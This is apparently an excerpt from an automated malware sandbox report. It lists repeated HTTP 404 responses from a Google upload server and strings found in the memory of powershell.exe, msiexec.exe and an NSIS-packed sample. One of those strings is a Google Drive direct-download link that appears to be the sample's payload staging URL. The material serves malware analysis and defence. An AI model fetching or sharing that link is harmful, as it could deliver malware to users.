ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7CMAGJ4P3RtyKYTI_yma83CL7-J_fRvHl256OCmtZsctdshbHOewqllw7XKhzH1gRTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Ghh6kxvTLUmoona5PEFyIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTFMWbpsmnbaCvbReq2toZ54cu0uQoalTbeQsa6QXdM4F2KahWDcd6Y1uu1KlMPVr009ttaFPgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:27 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-fBMqfU6SJCLS9gQ2sVKgVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6YG-wP533zpSW2Pgig2gAcDyko8FuE_9TTL-2SHGo1eVinD9k5pEpfnMDHBhu7zUY_6NlGVtAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:29 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_RYoBGADUpc2arExJVO_Ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4REiFVw8sPYxN5QLQH-rVsAzsjhBRvRRzK6krqejdV1iNF1dM7TJpPvRAYXENA_ooO9rBtQG8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:31 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-uRln4_vuTGqVFwysL6ZxPQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS6HVrKz4TIH4icX86O5pVEAwConAKx9bJayRV9ponD18iLKauTy0QbTO6JXEWnRSgyEMJvMqgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:34 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ZhOHmlDLJppOzW87xS9dOQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS6c-u4qUQ1dPI4Jff6fNN6aSpuTZr5GIFtv6tsARWRFq190qlJUVls6sTXz_7_gb5-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:36 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-AEBfZAQt09BxH4Ecj_msPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTxZmnddbyWnozy_IUM0QG1d0YUaTgXfAaema2YNxrMVnaCr0nkYG4LLF5L0HPKhNq7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-9ep0vW_HI2VjBZOOUU_2nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4XLnev6bK1Dh37NhGUjDwdd-DUHFqBzp2aVeeX_n3h8DUNBt4XD4D2ohznx88wqHVRContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:40 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-pZZTc7RoMSYoYqj6mryZXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRsYHJskFjAxNQO27zjZHRmUx79GThTLu2mBjTRsP3myLseb_a3P44WyZ_qn5eM9mirContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:43 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-D3-rv8GaQoI25b8pFR4evw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4cr7db1X7EW6dRIhZK2eF3mNhdqlhonf8w-xC1osuVmTzAtbksU7R9VeJoE6Don1xt250mUOwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:45 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Jf1Leol0nNHC3TyWppTHkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Zy5JIsSxWpyXufA5mrywHjOVb2IjU98HUaEceBzebwP_8RlNSsNCjtm-OCSPEnZeXVKaT-DIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:48 GMTContent-Security-Policy: script-src 'nonce-jSaWvV7c7zdYp-GA7lDKIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6IAnZyOYX3yGygp7Mb62dE4Zmi_uFCKqyNswAJrJx5G3C5t7ciKYak5_njuTU8yxRieA2Ss_UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:50 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-VI5emukswZgdWeNReso7bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4IDEZ9M-RkPG74nJqg_MmxdlUZtPk59lrzJ_O6bCbrmOQxTdZt7iEANFj-JQG5tCPZfL1RleMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:17:52 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-yi4zFc4YBfras0kJrdZqAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000001.00000002.2311002743.0000000007B2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: Xjz8dblHDe.exe, Xjz8dblHDe.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.2305178849.0000000005426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.2305178849.00000000052D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.2305178849.0000000005426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000001.00000002.2305178849.00000000052D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.2309066528.0000000006338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3009073152.0000000004297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=d
      Source: msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2474312583.0000000004298000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2618470604.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: msiexec.exe, 00000005.00000003.2569483717.0000000004296000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2592708971.0000000004296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/(
      Source: msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download
      Source: msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloadG
      Source: msiexec.exe, 00000005.00000002.3316835676.000000000422A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-E9HGynPt93xpQhV1zy1K5eJxu_tls&export=downloadc
      Source: msiexec.exe, 00000005.00000002.3316965083.000000000429F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2997665236.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3009073152.0000000004297000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.3020650857.0000000004297000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/P
